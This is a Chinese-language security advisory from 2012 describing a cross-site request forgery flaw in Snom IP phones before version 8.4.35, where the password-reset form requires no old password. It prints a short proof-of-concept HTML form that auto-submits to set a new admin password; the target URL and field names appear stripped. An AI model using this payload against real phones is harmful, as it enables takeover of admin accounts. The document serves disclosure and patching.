发布日期:2012-02-23
更新日期:2012-02-24
受影响系统:
Snom IP Phone < 8.4.35
描述:
--------------------------------------------------------------------------------
Snom是德国的一家VoIP电话厂商。
snom IP Phone在实现上存在安全漏洞,管理员登录表格与重置管理密码表格相同,无需输入旧密码即可更改密码,导致跨站请求伪造,从而提升权限。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Nathaniel Carew ()提供了如下测试方法:
<?php echo htmlentities('<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=" "
method="POST">
<input type="text" value="on">
<input type="text" value="newpass">
<input type="text" value="newpass">
<input type="text" value="save">
</form>
</body><br>
</html>'); ?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Snom
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: